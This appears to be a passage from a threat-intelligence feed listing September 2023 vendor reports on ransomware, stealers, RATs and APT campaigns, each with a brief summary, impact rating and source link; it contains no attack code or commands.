Following the recent data leak from Sony, the same ransomware syndicate, Ransomed.vc, announced a new victim, this time the largest Japanese telecommunications giant, NTT Docomo.
Source: https://www.resecurity.com/blog/article/ransomedvc-in-the-spotlight-what-is-known-about-the-ransomware-group-targeting-major-japanese-businesses
2023-09-28
Hackers_Exploiting_Openfire_Flaw_to_Encrypt_Servers
LOW
+
Intel Source:
DR. Web
Intel Name:
Hackers_Exploiting_Openfire_Flaw_to_Encrypt_Servers
Date of Scan:
2023-09-28
Impact:
LOW
Summary:
Openfire messaging servers have a high-severity vulnerability that hackers are actively using to install cryptominers and encrypt servers with ransomware. A popular Java-based open-source chat (XMPP) server called Openfire has been downloaded 9 million times and is frequently used for private, cross-platform chat communications.
Source: https://news.drweb.com/show/?i=14756&lng=enu
2023-09-28
A_new_stealer_called_Exela
LOW
+
Intel Source:
Cyble
Intel Name:
A_new_stealer_called_Exela
Date of Scan:
2023-09-28
Impact:
LOW
Summary:
Cyble researchers recently came across a new stealer called “Exela”. Exela is a Python-based open-source stealer capable of stealing a wide range of sensitive information from compromised systems.
Source: https://cyble.com/blog/exela-stealer-spotted-targeting-social-media-giants/
2023-09-27
ShadowSyndicate_a_new_RaaS_threat_actor
MEDIUM
+
Intel Source:
Group-IB
Intel Name:
ShadowSyndicate_a_new_RaaS_threat_actor
Date of Scan:
2023-09-27
Impact:
MEDIUM
Summary:
Group-IB researchers have identified a threat actor dubbed ShadowSyndicate using the same Secure Shell (SSH) fingerprint on many servers. It is a threat actor that collaborates with other ransomware organizations and programs' affiliates. ShadowSyndicate employs an "off-the-shelf" toolbox for its attacks, which includes Cobalt Strike, IcedID, and Sliver.
Source: https://www.group-ib.com/blog/shadowsyndicate-raas/
2023-09-27
AtlasCross_Hackers_Using_American_Red_Cross_as_Phishing_Lure
LOW
+
Intel Source:
NSFOCUS
Intel Name:
AtlasCross_Hackers_Using_American_Red_Cross_as_Phishing_Lure
Date of Scan:
2023-09-27
Impact:
LOW
Summary:
A new APT hacking outfit called AtlasCross has been identified by NSFOCUS researchers. AtlasCross targets organizations using phishing lures that pretend to be the American Red Cross in order to spread backdoor malware. They think that a new APT attacker, with a high level of technical proficiency and a careful assault mindset, is responsible for this new attack method. This time, phishing attack activity was observed as part of the attacker's focused attack on particular targets and served as its primary method of in-domain penetration.
Source: https://nsfocusglobal.com/warning-newly-discovered-apt-attacker-atlascross-exploits-red-cross-blood-drive-phishing-for-cyberattack/
2023-09-26
The_expansion_of_a_Smishing_Triad_attack
LOW
+
Intel Source:
Resecurity
Intel Name:
The_expansion_of_a_Smishing_Triad_attack
Date of Scan:
2023-09-26
Impact:
LOW
Summary:
This month, the “Smishing Triad” expanded its activity into the UAE. Resecurity researchers identified domain names that closely resemble those used by the group in previous campaigns. Threat actors registered the majority of these UAE-focused domains with Gname.com Pte. Ltd.,
Source: https://www.resecurity.com/blog/article/Smishing-Triad-Impersonates-Emirates-Post-Target-UAE-Citizens
2023-09-26
A_New_Malware_Called_ZenRAT
LOW
+
Intel Source:
Proofpoint
Intel Name:
A_New_Malware_Called_ZenRAT
Date of Scan:
2023-09-26
Impact:
LOW
Summary:
Researchers from Proofpoint have discovered a brand-new piece of malware dubbed ZenRAT that spreads through fake Bitwarden installation packages. The malware will divert users of other hosts to a safe website and primarily targets Windows users.
Source: https://www.proofpoint.com/us/blog/threat-insight/zenrat-malware-brings-more-chaos-calm
2023-09-26
The_examination_of_Lu0Bot_malware_malicious_activity
LOW
+
Intel Source:
Any Run
Intel Name:
The_examination_of_Lu0Bot_malware_malicious_activity
Date of Scan:
2023-09-26
Impact:
LOW
Summary:
Any.Run analysts caught some malicious activity that triggered their interest. The sample is written in Node.js. While it initially appeared to be a regular bot for DDoS attacks, it turned out to be a lot more complex.
Source: https://any.run/cybersecurity-blog/lu0bot-analysis/
2023-09-26
Chinese_Hackers_TAG_74_Targeting_Organizations_in_South_Korea
LOW
+
Intel Source:
Recorded Future
Intel Name:
Chinese_Hackers_TAG_74_Targeting_Organizations_in_South_Korea
Date of Scan:
2023-09-26
Impact:
LOW
Summary:
Recorded Future researchers have identified that a multi-year Chinese state-sponsored cyber espionage campaign has been observed targeting South Korean academic, political, and government organizations.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf
2023-09-26
Ramps_Up_Its_Spying_Activities
LOW
+
Intel Source:
Mandiant
Intel Name:
Ramps_Up_Its_Spying_Activities
Date of Scan:
2023-09-26
Impact:
LOW
Summary:
Researchers from Mandiant have discovered that APT29's activity and focus on Ukraine accelerated in the first half of 2023 as Kyiv began its counteroffensive, highlighting the SVR's crucial role in gathering intelligence on the current critical stage of the war.
Source: https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing
2023-09-26
Unveiling_the_Installation_Process_of_Cryptocurrency_CoinMiners
LOW
+
Intel Source:
ASEC
Intel Name:
Unveiling_the_Installation_Process_of_Cryptocurrency_CoinMiners
Date of Scan:
2023-09-26
Impact:
LOW
Summary:
AhnLab Security Emergency Response Center (ASEC) has revealed the process of cryptocurrency CoinMiner installation on compromised systems. Threat actors employ PowerShell scripts, primarily "nodejssetup-js.exe," to exploit system resources. Malicious behaviors include code decoding, process injection, and crypto mining. Detecting this threat relies on behavior detection via AhnLab EDR. Vigilance, endpoint security, and detailed analysis are essential for defense against this evolving threat.
Source: https://asec.ahnlab.com/en/57222/
2023-09-26
Ukraines_Military_Targeted_in_STARK_VORTEX_with_MerlinAgent_Malware
LOW
+
Intel Source:
Securonix Threat Labs
Intel Name:
Ukraines_Military_Targeted_in_STARK_VORTEX_with_MerlinAgent_Malware
Date of Scan:
2023-09-26
Impact:
LOW
Summary:
Securonix Threat Research has uncovered an ongoing cyber attack campaign, dubbed STARK#VORTEX, that is specifically targeting Ukraine's military. Orchestrated by the threat group UAC-0154, this campaign utilizes sophisticated techniques to evade detection. The attackers use a Microsoft Help file with an embedded obfuscated JavaScript code as a lure document, disguised as a manual for Pilot-in-Command (PIC) Drones, to deliver the MerlinAgent malware. The PowerShell-based malware is heavily obfuscated and downloads a payload from a remote server, giving attackers full control over compromised systems.
Source: https://www.securonix.com/blog/threat-labs-security-advisory-new-starkvortex-attack-campaign-threat-actors-use-drone-manual-lures-to-deliver-merlinagent-payloads/
2023-09-26
Unmasking_the_Threat_Impersonating_the_National_Tax_Service
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Unmasking_the_Threat_Impersonating_the_National_Tax_Service
Date of Scan:
2023-09-26
Impact:
MEDIUM
Summary:
AhnLab Security Emergency Response Center (ASEC) has identified a concerning threat involving deceptive LNK files posing as the National Tax Service. This threat primarily targets Korean users through email-based distribution. When executed, the LNK file triggers a series of actions, including downloading additional malicious files and compromising user information. Quasar RAT and Amadey malware have been identified as the final payloads.
Source: https://asec.ahnlab.com/en/57176/
2023-09-26
A_detection_of_cryptojacking_campaign_on_a_popular_educational_resource
LOW
+
Intel Source:
Group-IB
Intel Name:
A_detection_of_cryptojacking_campaign_on_a_popular_educational_resource
Date of Scan:
2023-09-26
Impact:
LOW
Summary:
Group-IB analysts observed and provided details of a cryptojacking campaign on a popular educational resource, using Group-IB Managed XDR.
Source: https://www.group-ib.com/blog/mxdr-cryptominer/
2023-09-25
Hackers_Using_Gelsemium_to_Attack_Asian_Government
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Hackers_Using_Gelsemium_to_Attack_Asian_Government
Date of Scan:
2023-09-25
Impact:
MEDIUM
Summary:
Researchers from Palo Alto have discovered that attacks on a Southeast Asian government that took place over the course of six months in 2022 and 2023 were carried out by a stealthy advanced persistent threat (APT) tracked as Gelsemium. It included a variety of uncommon tools and methods that the threat actor used to establish a covert presence and gather information on private IIS servers owned by a Southeast Asian government organization.
Source: https://unit42.paloaltonetworks.com/rare-possible-gelsemium-attack-targets-se-asia/#post-130207-_p2rfyft6epfb
2023-09-25
The_Retch_and_S_H_O_ransomware_overview
LOW
+
Intel Source:
fortinet
Intel Name:
The_Retch_and_S_H_O_ransomware_overview
Date of Scan:
2023-09-25
Impact:
LOW
Summary:
FortiGuard Labs collected data on new ransomware variants that attracted attention within their datasets and the OSINT community. This ransomware report from FortiGuard covered the Retch and S.H.O ransomware.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-retch-and-sho
2023-09-25
Alloy_Taurus_Aims_to_Remain_Unnoticed
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Alloy_Taurus_Aims_to_Remain_Unnoticed
Date of Scan:
2023-09-25
Impact:
MEDIUM
Summary:
According to reports, the intrusion set connected to Alloy Taurus started in early 2022 and persisted into 2023, using unusual tactics and evading security measures for long-term persistence and reconnaissance. These attacks, carried out in six waves, take advantage of security holes in Microsoft Exchange Servers to deploy web shells, which act as a conduit to deliver additional payloads, including two previously unidentified .NET backdoors called Zapoa and ReShell that allow remote command execution and data collection.
Source: https://unit42.paloaltonetworks.com/alloy-taurus-targets-se-asian-government/
2023-09-25
Mustang_Panda_Using_ShadowPad_and_TONESHELL_Variant
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Mustang_Panda_Using_ShadowPad_and_TONESHELL_Variant
Date of Scan:
2023-09-25
Impact:
MEDIUM
Summary:
The attackers carried out a cyberespionage campaign with the goal of acquiring confidential documents and information while establishing a tenacious and covert foothold. The activity, which took place between the second and third quarters of 2021 and 2023, used a variety of technologies to conduct reconnaissance, steal credentials, keep access, and carry out post-compromise actions.
Source: https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/
2023-09-25
Deadglyph_on_Stealth_Falcon_in_Middle_East
LOW
+
Intel Source:
Welivesecurity
Intel Name:
Deadglyph_on_Stealth_Falcon_in_Middle_East
Date of Scan:
2023-09-25
Impact:
LOW
Summary:
Researchers from ESET have found Deadglyph, a powerful backdoor that the famed Stealth Falcon gang utilized for Middle Eastern espionage. With the use of a machine-specific key, the essential parts are encrypted. Additional modules obtained from its C&C server are used to implement conventional backdoor commands.
Source: https://www.welivesecurity.com/en/eset-research/stealth-falcon-preying-middle-eastern-skies-deadglyph/
2023-09-25
From_ScreenConnect_to_Hive_Ransomware
LOW
+
Intel Source:
The DFIR Report
Intel Name:
From_ScreenConnect_to_Hive_Ransomware
Date of Scan:
2023-09-25
Impact:
LOW
Summary:
Researchers from the DFIR Report have seen a threat actor use an RMM tool as their first point of access, which led to a slightly bungled Hive ransomware deployment. An executable file disguised as a legitimate document made up the initial payload. Researchers believe that this campaign was most likely sent as an email with a link that, when clicked, downloaded the executable.
Source: https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/
2023-09-23
Analyzing_the_Turla_APT_Group_Activities
LOW
+
Intel Source:
TrendMicro
Intel Name:
Analyzing_the_Turla_APT_Group_Activities
Date of Scan:
2023-09-23
Impact:
LOW
Summary:
Researchers from TrendMicro have studied the Turla cyberespionage gang's efforts throughout the years, paying particular attention to the key MITRE techniques and the accompanying IDs connected to the threat actor group.
Source: https://www.trendmicro.com/en_us/research/23/i/examining-the-activities-of-the-turla-group.html
2023-09-23
APT34_group_new_phishing_attack
LOW
+
Intel Source:
Saudiresta
Intel Name:
APT34_group_new_phishing_attack
Date of Scan:
2023-09-23
Impact:
LOW
Summary:
The Iranian threat group APT34 has been observed launching a new phishing attack that used a variant of a backdoor called SideTwist. APT34, also known as Cobalt Gypsy, Hazel Sandstorm (formerly Europium), Helix Kitten, and OilRig, has a track record of targeting the telecommunications, government, defense, oil, and financial services verticals in the Middle East.
Source: https://www.saudiresta.com/phishing-campaigns-deliver-new-sidetwist-backdoor-and-agent-tesla-variant/
2023-09-22
Targeting_Telcos_with_a_LuaJIT_Toolkit
LOW
+
Intel Source:
SentinelOne
Intel Name:
Targeting_Telcos_with_a_LuaJIT_Toolkit
Date of Scan:
2023-09-22
Impact:
LOW
Summary:
A series of cyberattacks against telecommunications providers in the Middle East, Western Europe, and the South Asian subcontinent has been linked to a hitherto unknown threat actor known as Sandman. Notably, the intrusions use the LuaJIT just-in-time (JIT) compiler to deliver the novel LuaDream implant.
Source: https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/
2023-09-22
A_Banker_Server_Side_Components_Analysis
LOW
+
Intel Source:
Checkpoint
Intel Name:
A_Banker_Server_Side_Components_Analysis
Date of Scan:
2023-09-22
Impact:
LOW
Summary:
A recent campaign utilizing a new form of the BBTok banker and operating in Latin America was recently uncovered by Check Point researchers. In the study, we focus on recently identified infection chains that employ a special mix of Living off the Land Binaries (LOLBins).
Source: https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/
2023-09-22
An_ongoing_campaign_on_the_npm_registry
LOW
+
Intel Source:
Sonatype
Intel Name:
An_ongoing_campaign_on_the_npm_registry
Date of Scan:
2023-09-22
Impact:
LOW
Summary:
The Sonatype research team tracked down a campaign on the npm registry that uses npm packages to retrieve and exfiltrate your Kubernetes configuration and SSH keys to an external server.
Source: https://blog.sonatype.com/npm-packages-caught-exfiltrating-kubernetes-config-ssh-keys
2023-09-22
Drinik_Malware_Returns_to_Threaten_Indian_Taxpayers
LOW
+
Intel Source:
Cyble
Intel Name:
Drinik_Malware_Returns_to_Threaten_Indian_Taxpayers
Date of Scan:
2023-09-22
Impact:
LOW
Summary:
Researchers from Cyble have noticed that the Drinik malware showed increased activity levels that were timed to coincide with the deadline for filing Indian income tax returns. Drinik malware's most recent version includes a number of recently introduced features.
Source: https://cyble.com/blog/indian-taxpayers-face-a-multifaceted-threat-with-drinik-malwares-return/
2023-09-22
Iranian_Nation_State_Actor_OilRig_Attacks_sraeli_Organizations
LOW
+
Intel Source:
Welivesecurity
Intel Name:
Iranian_Nation_State_Actor_OilRig_Attacks_sraeli_Organizations
Date of Scan:
2023-09-22
Impact:
LOW
Summary:
As part of two distinct campaigns planned by the Iranian nation-state actor known as OilRig in 2021 and 2022, Israeli organizations have been identified by ESET researchers as being targeted. Two previously known first-stage backdoors called Solar and Mango were used in the attacks, dubbed Outer Space and Juicy Mix, to gather sensitive data from popular browsers and the Windows Credential Manager.
Source: https://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/
2023-09-22
Investigation_into_WinRAR_Vulnerability
LOW
+
Intel Source:
McAfee
Intel Name:
Investigation_into_WinRAR_Vulnerability
Date of Scan:
2023-09-22
Impact:
LOW
Summary:
McAfee researchers examined a sample that exploited the major RCE vulnerability CVE-2023-38831, an RCE flaw in WinRAR prior to version 6.23. The problem arises because a ZIP archive can contain a harmless file (such as a regular .JPG file) as well as a folder with the same name as the innocent file, and when you try to open just the harmless file, the contents of the folder (which may contain executable content) are processed instead.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/exploring-winrar-vulnerability-cve-2023-38831/
2023-09-22
The_Evil_Alliance_Between_GuLoader_And_Remcos
LOW
+
Intel Source:
Checkpoint
Intel Name:
The_Evil_Alliance_Between_GuLoader_And_Remcos
Date of Scan:
2023-09-22
Impact:
LOW
Summary:
Remcos and GuLoader have a close relationship, according to Checkpoint researchers. Remcos is hard to employ for nefarious reasons because antivirus programs may quickly detect it. However, Remcos can get around antivirus defense by using GuLoader. During this investigation, they found that GuLoader is now marketed as a crypter that renders its payload completely immune to antivirus software on the same platform as Remcos and is implicitly sold under a different name.
Source: https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/
2023-09-22
Analysis_of_SmokeLoaders_Plugins
LOW
Intel Source:
Bitsight
Intel Name:
Analysis_of_SmokeLoaders_Plugins
Date of Scan:
2023-09-22
Impact:
LOW
Summary:
SmokeLoader is a well-known malware family with a history spanning more than ten years. Its primary function is to download and drop additional malware families. However, SmokeLoader's owners also sell plugins that add new features to the primary module. These plugins give an affiliate the ability to gather a variety of information from compromised PCs, including emails, cookies, passwords, and browser data.
Source: https://www.bitsight.com/blog/smokeloaders-plugins
2023-09-21
An_Overview_of_NoEscape_Ransomware
MEDIUM
Intel Source:
SOC Radar
Intel Name:
An_Overview_of_NoEscape_Ransomware
Date of Scan:
2023-09-21
Impact:
MEDIUM
Summary:
NoEscape ransomware first appeared in May 2023 as a Ransomware-as-a-Service (RaaS). NoEscape RaaS operators provide affiliates with a complete platform that makes it simple to create and administer payloads designed specifically for both Windows and Linux operating systems. NoEscape is also known for its multi-extortion techniques and maintains a blog on the Tor network where it openly lists its victims and publishes the data exfiltrated from those who refuse to comply with its demands.
Source: https://socradar.io/dark-web-profile-noescape-ransomware/
2023-09-21
Attack_on_MS_SQL_Servers_by_HiddenGh0st_Malware
LOW
Intel Source:
ASEC
Intel Name:
Attack_on_MS_SQL_Servers_by_HiddenGh0st_Malware
Date of Scan:
2023-09-21
Impact:
LOW
Summary:
ASEC researchers recently confirmed the spread of a Gh0st RAT variant that targets poorly managed MS-SQL servers and installs the Hidden rootkit. Hidden, an open-source rootkit publicly available on GitHub, can protect processes and hide files, registry entries, and even itself.
Source: https://asec.ahnlab.com/en/57185/
2023-09-21
Advisory_on_Snatch_Ransomware
MEDIUM
Intel Source:
CISA
Intel Name:
Advisory_on_Snatch_Ransomware
Date of Scan:
2023-09-21
Impact:
MEDIUM
Summary:
The FBI and CISA released a joint Cybersecurity Advisory on Snatch ransomware that shares IOCs, tactics, techniques, and procedures linked with the Snatch ransomware variant. Snatch threat actors operate under a ransomware-as-a-service (RaaS) model and change their tactics according to current cybercriminal trends and the successes of other ransomware operations.
Source: https://www.cisa.gov/sites/default/files/2023-09/joint-cybersecurity-advisory-stopransomware-snatch-ransomware_0.pdf
2023-09-21
Gold_Melody_Group_Selling_Compromised_Access_to_Ransomware_Attackers
LOW
Intel Source:
Secureworks
Intel Name:
Gold_Melody_Group_Selling_Compromised_Access_to_Ransomware_Attackers
Date of Scan:
2023-09-21
Impact:
LOW
Summary:
Researchers at Secureworks have exposed a financially motivated threat actor as an initial access broker (IAB) who buys access to compromised businesses from other adversaries in order to launch follow-up attacks such as ransomware. The e-crime group is tracked as Gold Melody, also known as Prophet Spider (CrowdStrike) and UNC961 (Mandiant).
Source: https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker
2023-09-21
Fake_WinRAR_PoC_Exploit_Drops_VenomRAT
LOW
Intel Source:
PaloAlto
Intel Name:
Fake_WinRAR_PoC_Exploit_Drops_VenomRAT
Date of Scan:
2023-09-21
Impact:
LOW
Summary:
Researchers from Palo Alto have discovered a threat actor attempting to infect downloaders with the VenomRAT malware by distributing a phony proof-of-concept (PoC) exploit for a newly patched WinRAR vulnerability on GitHub.
Source: https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/
2023-09-21
P2Pinfect_Botnet_Targeting_Redis_and_SSH_Services
LOW
Intel Source:
Cado Security
Intel Name:
P2Pinfect_Botnet_Targeting_Redis_and_SSH_Services
Date of Scan:
2023-09-21
Impact:
LOW
Summary:
According to Cado Security researchers, P2Pinfect compromises have been observed in China, the United States, Germany, the UK, Singapore, Hong Kong, and Japan. Since August 28, the new peer-to-peer botnet P2Pinfect, which targets open-source Redis and SSH services, has seen a remarkable 600x rise in traffic, including a 12.3% increase over the previous week.
Source: https://www.cadosecurity.com/cado-security-labs-researchers-witness-a-600x-increase-in-p2pinfect-traffic/
2023-09-20
Chinese_Malware_Emerges_Widely
LOW
Intel Source:
Proofpoint
Intel Name:
Chinese_Malware_Emerges_Widely
Date of Scan:
2023-09-20
Impact:
LOW
Summary:
Researchers at Proofpoint have noticed an uptick in activity from particular malware families that target Chinese speakers. In Chinese-themed cybercrime, the recently discovered ValleyRAT is emerging, while Sainbox RAT and its related variants have also recently become active.
Source: https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape
2023-09-20
Silent_Skimmer_Targeting_APAC_and_NALA_Regions
LOW
Intel Source:
Blackberry
Intel Name:
Silent_Skimmer_Targeting_APAC_and_NALA_Regions
Date of Scan:
2023-09-20
Impact:
LOW
Summary:
Researchers from BlackBerry have uncovered a brand-new campaign they call "Silent Skimmer," in which a financially motivated threat actor preys on vulnerable online payment companies in the APAC and NALA regions. The attacker exploits flaws to compromise web servers and gain initial access. The final payload uses payment-scraping tools to collect consumers' sensitive financial information from the compromised websites.
Source: https://blogs.blackberry.com/en/2023/09/silent-skimmer-online-payment-scraping-campaign-shifts-targets-from-apac-to-nala
2023-09-19
The_multiple_investigation_to_the_Akira_ransomware_group
LOW
Intel Source:
CyberCX
Intel Name:
The_multiple_investigation_to_the_Akira_ransomware_group
Date of Scan:
2023-09-19
Impact:
LOW
Summary:
CyberCX researchers assisted with multiple investigations linked to the Akira ransomware group, which has been active for the last couple of months. They observed a technique in which ransomware is deployed onto Windows Hyper-V hypervisor systems, causing major damage to the attached virtual machines (VMs).
Source: https://cybercx.co.nz/blog/akira-ransomware/
2023-09-19
New_HTTPSnoop_malware_targets_telecom_providers
LOW
Intel Source:
Talos
Intel Name:
New_HTTPSnoop_malware_targets_telecom_providers
Date of Scan:
2023-09-19
Impact:
LOW
Summary:
Cisco Talos has discovered a new malware family, "HTTPSnoop", being deployed against telecommunications providers in the Middle East. HTTPSnoop is a simple but very effective backdoor that uses new techniques to interface with Windows HTTP kernel drivers and devices, listen for incoming requests to specific HTTP(S) URLs, and execute the content of those requests on the infected endpoint.
Source: https://blog.talosintelligence.com/introducing-shrouded-snooper/
2023-09-19
Five_malware_samples_backdoors_analysis
MEDIUM
Intel Source:
CISA
Intel Name:
Five_malware_samples_backdoors_analysis
Date of Scan:
2023-09-19
Impact:
MEDIUM
Summary:
CISA obtained five malware samples related to the SUBMARINE, SKIPJACK, SEASPRAY, WHIRLPOOL, and SALTWATER backdoors. The device was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of the Barracuda Email Security Gateway (ESG).
Source: https://www.cisa.gov/news-events/analysis-reports/ar23-250a-0
2023-09-19
The_usage_of_an_open_source_PySilon_RAT_by_multiple_threat_actors
LOW
Intel Source:
Cyble
Intel Name:
The_usage_of_an_open_source_PySilon_RAT_by_multiple_threat_actors
Date of Scan:
2023-09-19
Impact:
LOW
Summary:
Cyble researchers have observed the use of the open-source PySilon RAT by multiple threat actors. The current version has advanced malware capabilities, including the ability to record keystrokes, steal sensitive information, capture screen activity, execute remote commands, and perform additional functions.
Source: https://cyble.com/blog/emerging-threat-understanding-the-pysilon-discord-rats-versatile-features/
2023-09-19
LockBit_Gang_Attacks_an_MSP_and_Two_Manufacturers
MEDIUM
Intel Source:
Esentire
Intel Name:
LockBit_Gang_Attacks_an_MSP_and_Two_Manufacturers
Date of Scan:
2023-09-19
Impact:
MEDIUM
Summary:
eSentire, one of the top MDR security services providers, caught and shut down three separate ransomware attacks launched by the LockBit ransomware gang. LockBit is one of the most destructive ransomware groups currently operating worldwide. The targeted companies include a storage materials manufacturer, a manufacturer of home décor, and a Managed Service Provider.
Source: https://www.esentire.com/blog/russia-linked-lockbit-ransomware-gang-attacks-an-msp-and-two-manufacturers-using-the-targets-rmm-tools-to-infect-downstream-customers-and-employees-with-ransomware
2023-09-19
LokiBot_information_stealer
LOW
Intel Source:
Cofense
Intel Name:
LokiBot_information_stealer
Date of Scan:
2023-09-19
Impact:
LOW
Summary:
LokiBot is an Information Stealer with expanding capabilities depending on the threat actor. This malware family was originally written in C++ and targets Windows devices. LokiBot has remained in the top five malware families delivered through phishing emails.
Source: https://cofense2022stg.wpengine.com/blog/lokibot-phishing-malware-baseline/
2023-09-19
Liquidity_mining_scam_activity
LOW
Intel Source:
Sophos
Intel Name:
Liquidity_mining_scam_activity
Date of Scan:
2023-09-19
Impact:
LOW
Summary:
Sophos has observed one variant of liquidity mining scam growing at a rapid pace: the fake mining scheme. Sophos X-Ops has also seen growth in crypto phishing sites that connect to cryptocurrency wallets while impersonating crypto-trading brands in other types of scams; these sites are often used by sha zhu pan scammers to separate victims from their money.
Source: https://news.sophos.com/en-us/2023/09/18/latest-evolution-of-pig-butchering-scam-lures-victim-into-fake-mining-scheme/
2023-09-19
A_new_cloud_native_cryptojacking_operation_AMBERSQUID
LOW
Intel Source:
Sysdig
Intel Name:
A_new_cloud_native_cryptojacking_operation_AMBERSQUID
Date of Scan:
2023-09-19
Impact:
LOW
Summary:
The Sysdig Threat Research Team has uncovered a novel cloud-native cryptojacking operation called AMBERSQUID. The operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker.
Source: https://sysdig.com/blog/ambersquid/
2023-09-19
Cobalt_Strike_Beacon_delivery
LOW
Intel Source:
Cyble
Intel Name:
Cobalt_Strike_Beacon_delivery
Date of Scan:
2023-09-19
Impact:
LOW
Summary:
Cyble researchers observed a typosquatted domain impersonating Sophos. The phishing site contains a malware payload embedded within its source code; when a user visits the site, the malware is automatically downloaded to the victim's machine without requiring any user interaction.
Source: https://cyble.com/blog/covert-delivery-of-cobalt-strike-beacon-via-sophos-phishing-website/
2023-09-19
RedLine_stealer_new_variant
LOW
Intel Source:
Cyfirma
Intel Name:
RedLine_stealer_new_variant
Date of Scan:
2023-09-19
Impact:
LOW
Summary:
A Cyfirma investigation revealed a new strain of malware being distributed under the guise of fake documents or software. It uses multi-level obfuscation to avoid detection and an obfuscated PowerShell script as a dropper to execute the malware.
Source: https://www.cyfirma.com/outofband/redline-stealer-a-new-variant-surfaces-deploying-using-batch-script/
2023-09-19
DotRunPeX_analysis
LOW
Intel Source:
Cert.Pl
Intel Name:
DotRunPeX_analysis
Date of Scan:
2023-09-19
Impact:
LOW
Summary:
Poland's national CERT observed a new malspam campaign targeting Polish users. It started with a phishing email sent from a legitimate employee account at a Polish company (using stolen credentials); a Polish C2 server was also used.
Source: https://cert.pl/en/posts/2023/09/unpacking-whats-packed-dotrunpex/
2023-09-18
A_recent_variant_of_the_Shlayer_malware
LOW
Intel Source:
SentinelOne
Intel Name:
A_recent_variant_of_the_Shlayer_malware
Date of Scan:
2023-09-18
Impact:
LOW
Summary:
SentinelOne shared details of the malware variant and how it can be decoded to reveal the telltale Shlayer signature. Shlayer is the most talked-about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple's macOS Notarization checks. That version of Shlayer was an interesting diversion: it used a Mach-O binary written in C++ to execute a Bash shell script in memory.
Source: https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/
2023-09-18
10_most_active_types_of_Turla_malware
LOW
Intel Source:
PaloAlto
Intel Name:
10_most_active_types_of_Turla_malware
Date of Scan:
2023-09-18
Impact:
LOW
Summary:
Palo Alto researchers analyzed the top 10 most recently active types of malware in Pensive Ursa’s arsenal: Capibar, Kazuar, Snake, Kopiluwak, QUIETCANARY/Tunnus, Crutch, ComRAT, Carbon, HyperStack and TinyTurla. MITRE has described Turla as being “known for their targeted intrusions and innovative stealth.”
Source: https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/
2023-09-18
Return_of_Bumblebee_Loader_in_New_Campaign
LOW
Intel Source:
Intel471
Intel Name:
Return_of_Bumblebee_Loader_in_New_Campaign
Date of Scan:
2023-09-18
Impact:
LOW
Summary:
Intel471 researchers have discovered a fresh campaign that uses WebDAV (Web Distributed Authoring and Versioning) servers to spread Bumblebee payloads. In this campaign, threat actors use malicious spam emails to send out Windows shortcut (.LNK) files and compressed archive (.ZIP) files that contain .LNK files. When triggered by the user, these LNK files run a preset sequence of commands designed to download Bumblebee malware stored on WebDAV servers.
Source: https://intel471.com/blog/bumblebee-loader-resurfaces-in-new-campaign
2023-09-18
Earth_Lusca_Hackers_Using_Cobalt_Strike
MEDIUM
Intel Source:
TrendMicro
Intel Name:
Earth_Lusca_Hackers_Using_Cobalt_Strike
Date of Scan:
2023-09-18
Impact:
MEDIUM
Summary:
While tracking Earth Lusca, TrendMicro researchers identified a Linux-based malware dubbed SprySOCKS, named for its swift behavior and its SOCKS implementation. It appears to derive from the open-source Windows backdoor Trochilus.
Source: https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html
2023-09-16
A_new_malicious_LNK_file_activity
LOW
Intel Source:
Deep Instinct
Intel Name:
A_new_malicious_LNK_file_activity
Date of Scan:
2023-09-16
Impact:
LOW
Summary:
The Deep Instinct Threat Lab has discovered a new operation against Azerbaijanian targets. The operation has at least two different initial access vectors. It is not associated with a known threat actor; it was instead named for the novel malware, written in the Rust programming language, that it uses.
Source: https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets
2023-09-15
Attacks_on_Defense_Organizations_by_Iranian_Hackers
MEDIUM
Intel Source:
Microsoft
Intel Name:
Attacks_on_Defense_Organizations_by_Iranian_Hackers
Date of Scan:
2023-09-15
Impact:
MEDIUM
Summary:
Since February 2023, Microsoft researchers have observed an Iran-backed threat group conducting password spray attacks against hundreds of organizations in the United States and around the world. Additionally, a small number of victims in the pharmaceutical, satellite, and defense industries had sensitive data stolen by the state-backed hackers.
Source: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
2023-09-15
BatLoader_malware_used_in_malicious_campaign
LOW
Intel Source:
Malwarebytes
Intel Name:
BatLoader_malware_used_in_malicious_campaign
Date of Scan:
2023-09-15
Impact:
LOW
Summary:
A new malvertising campaign is targeting corporate users who download the popular web conferencing software Webex. Malwarebytes researchers saw the same malicious ad whenever they searched for Webex.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/09/ongoing-webex-malvertising-drops-batloader
2023-09-15
New_Python_NodeStealer_campaign
LOW
Intel Source:
Netskope
Intel Name:
New_Python_NodeStealer_campaign
Date of Scan:
2023-09-15
Impact:
LOW
Summary:
